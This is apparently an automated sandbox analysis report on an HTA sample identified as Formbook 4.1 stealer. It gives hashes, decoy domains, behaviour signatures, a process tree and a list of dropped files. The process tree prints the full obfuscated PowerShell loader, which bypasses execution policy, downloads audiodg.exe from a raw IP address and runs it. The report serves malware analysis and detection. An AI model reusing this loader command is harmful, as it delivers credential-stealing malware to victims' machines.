Overview

overview

10

Static

static

1

f691fb2c2b...ce.hta

windows7-x64

10

f691fb2c2b...ce.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 18:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f691fb2c2b5183a496711a5b78b575ce.hta

  • Size

    115KB

  • MD5

    f691fb2c2b5183a496711a5b78b575ce

  • SHA1

    ce9603dd85d843e4fd9fa66843f46ca5ece4e260

  • SHA256

    1c7d8ace58257e970e2f7738886c596d8189f85cef9127dba9b324735f506821

  • SHA512

    ce1e7a6b64b0d14d1d42ddf134d5db74aa8a17c6945c32f17829fbce7f309bd8f34ac1d750548c66c1cf4dcbd234531c6f57e354ac5f605331d39a57d9bb11ba

  • SSDEEP

    96:Ea+M7iHLlFPiJSHLqFPiJGkpmfORxcHLoHLDFPiJTHLQcAT:Ea+QiHJFPlHOFPhLHsHfFPmHcT

Score
10/10
formbookj62tdefense_evasiondiscoveryexecutionratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

j62t

Decoy

qualegacy.shop

ijngblv.top

hop-tiktok.top

nti-aging-66026.bond

ostashqiptare-al.info

faretireltd.info

dra.finance

arden-office-45382.bond

nair.today

dence.tokyo

omoantifragilis.net

eet-new-people-26331.bond

ocfamilyto.llc

roduct-tester-jobs-68513.bond

elestialaurelia.buzz

uzzbuilders.buzz

ryptofaucet.xyz

krfq.shop

jbhu.vip

uemw.top

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Formbook payload 2 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
    defense_evasionexecution
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\f691fb2c2b5183a496711a5b78b575ce.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'JGNTRXluWUggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZbGJFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVNU21adlNwVix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFlmRWxjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVaSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInN4dGZOYiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0lHWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY1NFeW5ZSDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwMy4xMzEuMTMwLjE1NC8xNDQvYXVkaW9kZy5leGUiLCIkZU52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7U3RBclQtc0xFZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[cHaR]34+'))')))"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'JGNTRXluWUggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZbGJFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVNU21adlNwVix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFlmRWxjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVaSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInN4dGZOYiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0lHWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY1NFeW5ZSDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwMy4xMzEuMTMwLjE1NC8xNDQvYXVkaW9kZy5leGUiLCIkZU52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7U3RBclQtc0xFZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[cHaR]34+'))')))"
          4⤵
          • Blocklisted process makes network request
          • Evasion via Device Credential Deployment
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k3rpkvm_.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC79D1.tmp"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1960
          • C:\Users\Admin\AppData\Roaming\audiodg.exe
            "C:\Users\Admin\AppData\Roaming\audiodg.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1208
            • C:\Users\Admin\AppData\Roaming\audiodg.exe
              "C:\Users\Admin\AppData\Roaming\audiodg.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:568
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\audiodg.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2968

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES79D2.tmp
    Filesize

    1KB

    MD5

    86a49c4ef7013c7e4f5f509f367ba73a

    SHA1

    1021594f46fa4bac5bcfa85a2a10077f6d20928e

    SHA256

    5480a81b2d966a20a0ff8e3cd6581e7245c30f6508e1b4263e60f16a09803f5e

    SHA512

    41b4b47021bb9464368a85ed04bfe85480dda6c9ce829297d32495ef61c406f7377d44b4a7928e0daadefa191d67b0fabee8d577ded4a9c9cebe3dd83292d89b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\k3rpkvm_.dll
    Filesize

    3KB

    MD5

    65119072fec74cf404e38368ceb02ee3

    SHA1

    f99cc74d57e062bafce51f4cc9ab4114c035bdb5

    SHA256

    f7a0d350f038cc1aea90d0d2ec9bc93352df7e000f05914bb86cbe90db3c4b67

    SHA512

    5220ab3a691f59035550b822d2875bc92f5612cdd4ffd4cfbc0123afec2fb0fc177b5d826e6c59d346bfd885734140cecac0140ac1beb6f05caaace07098f6db

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\k3rpkvm_.pdb
    Filesize

    7KB

    MD5

    d23c0fecddd811453c9ea2cd3b404471

    SHA1

    5491247757fc36a01b299bf512220c5b947130a3

    SHA256

    3f21b923c134d05a11cda389f42d8b716ad0b1351340ef3897bb80999f5672ab

    SHA512

    7a429682bcd50c69cf91d4ffde86a6a0ed5976686b2a1e7578a5631f335b5ba655871c60a32b7a957edb8186007621e7f210427c3f5e955c7bfb081b0901b3a2

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC79D1.tmp
    Filesize

    652B

    MD5

    dbe4a136cfdc800d9d4a0c8c81aab839

    SHA1

    aed629f84dd35f874ef587712fb1f3e98c027be6

    SHA256

    21689d6356fac95aeb0e75526b43f9f22e41d0ced1fa0c00e23ec688cdca8ea8

    SHA512

    d096813c8a44677fb179aea029701edd90791b74dba544ee30bc3eeba8228352e603199adc77224e34befcecec942636916ab2670eb9f40431baab482eff530e

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\k3rpkvm_.0.cs
    Filesize

    467B

    MD5

    deec2cbeef08f5d6a07a39fd4189249f

    SHA1

    174ed8f143660c9aba228b6a5dbe05bd39e0372c

    SHA256

    b670540a59065657d3544089a447a84d4b8a1bc8004be85311d3fff5ae0ea6ad

    SHA512

    54ffbed2df5ee7fd1a014f58147375bfab9794b1339b18a78d004138926835aea1e99ff3ae35acdcb39a0dda05fdddabec891ad8b1e22f79f3ffa4cf595d452d

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\k3rpkvm_.cmdline
    Filesize

    309B

    MD5

    035364ddefa18ca3c135e59bd34487c3

    SHA1

    8629aa3f6450631f09d0674e62f099c577a6dffc

    SHA256

    82d993ab3abc79a75a098e007d8655c639966ccb3cd3a7026c4c922e2c3c9e19

    SHA512

    3806f022e7fb396f932c67eaef51f9a6f5fb22ad89a5b83bd142417d52225b6344be7db414f62f52fe41fa57075f2b8c2e57acca251941fd19d32a5d2186e418

    Download Submit

  • \Users\Admin\AppData\Roaming\audiodg.exe
    Filesize

    770KB

    MD5

    13026754941320e654b4d10b8c7c37d4

    SHA1

    0c355a2c24b09bd90e84bc58c842176d0b18569f

    SHA256

    58cdcd2f49080d4471ffd169eb6cfe86f9efae01e45423492d0e31a4db510d60

    SHA512

    77cc08168c0a860f56157a0926c7cee8bd18531a85869e38b1fb585e20b03e11c669a7d1a4cf002e7f06a46e8b47411c0393913e161cc05a4717db011b799279

    Download Submit

  • memory/568-47-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/568-43-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/568-48-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/568-45-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/1208-40-0x00000000002F0000-0x0000000000302000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1208-41-0x0000000004B30000-0x0000000004BA6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/1208-39-0x0000000000FD0000-0x0000000001096000-memory.dmp

    Filesize

    792KB

    Download

  • memory/1220-51-0x0000000003D90000-0x0000000003F90000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2268-52-0x0000000000990000-0x00000000009A4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2268-54-0x0000000000990000-0x00000000009A4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2268-55-0x00000000000D0000-0x00000000000FF000-memory.dmp

    Filesize

    188KB

    Download